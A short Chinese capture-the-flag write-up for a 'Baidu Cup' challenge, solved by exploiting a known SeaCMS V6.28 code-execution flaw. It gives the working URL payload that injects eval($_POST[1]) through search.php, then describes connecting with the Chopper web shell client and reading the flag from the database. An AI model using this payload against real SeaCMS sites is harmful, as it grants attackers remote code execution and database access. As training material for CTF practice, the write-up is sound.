“百度杯”CTF比賽 九月場_Test(海洋cms前台getshell)


題目在i春秋ctf訓練營

又是一道cms的通用漏洞的題,直接去百度查看通用漏洞

這里我使用的是以下這個漏洞:

海洋CMS V6.28代碼執行0day

按照給出的payload,直接訪問url+/search.php?searchtype=5&tid=&area=eval($_POST[1])

之后用菜刀連接,但乍一看並沒有flag.php

 

反手去查了一下海洋cms的數據庫配置文件的存放地址:

 

出去用菜刀連接數據庫

 

編輯完成后右鍵數據庫管理,可以看到flag了


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM